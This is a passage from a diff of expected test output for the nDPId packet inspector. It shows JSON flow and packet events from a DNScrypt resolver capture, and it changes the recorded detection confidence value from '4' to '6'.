AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":271,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739312402,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":40595,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":272,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739312402} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":272,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739312402,"pkt":"REREREREZmZmZmZmCABFAABQ7uIAub0RDUAKAAABXV\/ipQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00708{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":946739312405,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"thread_ts_msec":946739312405,"pkt":"ZmZmZmZmRERERERECABFAADUFOtAADYRDapCVR5zCgAAAQG7nKMAwIXDLCqBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlldmlsdmliZXMDY29tAAAQAAHADAAQAAEAAHCAAH18RE5TQwACAADd8l9MieIsifjQGavIzw6tdHygby+pfz9uNV\/2so9cMC7hGKDfc+LzmB07CCRnhhWiHEKH9gFPecA8dSkDUDQHbk9p0e06j3wfoDIfK8NHA0t38M\/xpcLwZlzH2416A0JuT2nR7TqPfAAAAAFfU1T+X1Smfg=="} @@ -554,26 +554,26 @@ 00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":278,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":2,"flow_last_seen":946739312466,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":946739312466,"pkt":"ZmZmZmZmRERERERECABFAADTA\/UAADYRf2RdX+KlCgAAAQG75jgAv7Apx+iBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydANpczIEZDB3bgNiaXoAABAAAcAMABAAAQAAAAAAfXxETlNDAAEAAEQUmbKEod9nlyKPPrQqGP9Ls8t6H\/YHI72RThtMayAXvqOxd6z058i8UJ7+KMLpc+YgjKuAGDN2+1oeB3OFIgnw9LuNjyX7NTXMUO6Dulhi3d3ExK4wLeAsg632WDfaPfD0u42PJfs1X1OugV9TroFfVQAB"} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAIcmsFAAL0RhlMKAAABM56mYZCrAbsCCJzVB2IBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":279,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":37035,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAXcmsIgAL0RopIKAAABM56mYbiZAbsGBBC9B18BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":280,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":47257,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":281,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317403} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":281,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAABQmsIAub0Rx2UKAAABM56mYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02426{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAXcmsMgAL0RopEKAAABM56mYbPyAbsGBBVmB10BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAAFvwAMBbsAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00663{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":282,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":283,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739317403} 00420{"packet_event_id":1,"packet_event_name":"packet","packet_id":283,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAABQmsMAub0Rx2QKAAABM56mYQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":946739317403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739317403,"pkt":"REREREREZmZmZmZmCABFAAIcmsRAAL0RhlAKAAABM56mYdyuAbsCCJzVB2ABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAxhY3NhY3Nhci1hbXMDY29tAAAQAAEAAAAAAAAAAAABwwAMAb8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":285,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317403,"flow_last_seen":946739317403,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739317403,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":60334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 